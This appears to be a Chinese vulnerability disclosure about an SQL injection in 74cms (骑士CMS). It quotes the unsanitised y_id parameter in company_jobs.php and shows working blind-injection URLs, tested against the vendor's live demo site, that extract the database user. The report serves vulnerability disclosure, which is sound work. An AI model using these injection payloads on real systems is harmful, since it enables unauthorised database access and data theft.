VULHUB ™

### 简要描述： 骑士CMS某接口SQL注入，官网测试。 ### 详细说明： 翻了翻代码，看到有这么一段： user/company/company_jobs.php: ``` elseif ($act=='jobs_perform') { global $_CFG; $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']; $jobs_num=count($yid); if (empty($yid)) { showmsg("ÄãûÓÐÑ¡Ôñְλ£¡",1); } $refresh=!empty($_POST['refresh'])?$_POST['refresh']:$_GET['refresh']; $delete=!empty($_POST['delete'])?$_POST['delete']:$_GET['delete']; if ($refresh) { if($jobs_num==1){ if(is_array($yid)){ $yid = $yid[0]; } $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid); if(empty($jobs_info)){ $jobs_info = $db->getone("select * from ".table('jobs_tmp')." where id=".$yid); } if($jobs_info['deadline']<time()){ showmsg("žÃְλÒѵœÆÚ£¬ÇëÏÈÑÓÆÚ£¡",1); } } ``` 下面的GET/POST参数没有check, ``` $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id'] ``` 然后就带入了SQL： ``` $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid); ``` 这不是可以注入么？官网试试，果然是这样： ```...

### 简要描述： 骑士CMS某接口SQL注入，官网测试。 ### 详细说明： 翻了翻代码，看到有这么一段： user/company/company_jobs.php: ``` elseif ($act=='jobs_perform') { global $_CFG; $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']; $jobs_num=count($yid); if (empty($yid)) { showmsg("ÄãûÓÐÑ¡Ôñְλ£¡",1); } $refresh=!empty($_POST['refresh'])?$_POST['refresh']:$_GET['refresh']; $delete=!empty($_POST['delete'])?$_POST['delete']:$_GET['delete']; if ($refresh) { if($jobs_num==1){ if(is_array($yid)){ $yid = $yid[0]; } $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid); if(empty($jobs_info)){ $jobs_info = $db->getone("select * from ".table('jobs_tmp')." where id=".$yid); } if($jobs_info['deadline']<time()){ showmsg("žÃְλÒѵœÆÚ£¬ÇëÏÈÑÓÆÚ£¡",1); } } ``` 下面的GET/POST参数没有check, ``` $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id'] ``` 然后就带入了SQL： ``` $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid); ``` 这不是可以注入么？官网试试，果然是这样： ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27 ``` 返回SQL错误： [<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png) 好了，试试盲注猜user(): 错误的返回： ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110)) ``` [<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png) 正确时候的返回： ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114)) ``` [<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png) 中间过程略，可以猜到： ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)) ``` [<img src="https://images.seebug.org/upload/201411/011806477efd8b7deb1fc2e53542c3b5121afc9e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/011806477efd8b7deb1fc2e53542c3b5121afc9e.png) ``` > select char(114,111,111,116,64,108,111,99,97,108,104,111,115,116); +------------------------------------------------------------+ | char(114,111,111,116,64,108,111,99,97,108,104,111,115,116) | +------------------------------------------------------------+ | root@localhost | +------------------------------------------------------------+ 1 row in set (0.00 sec) ``` ### 漏洞证明： ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27 ``` [<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png) ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110)) ``` [<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png) ``` http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114)) ``` [<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png)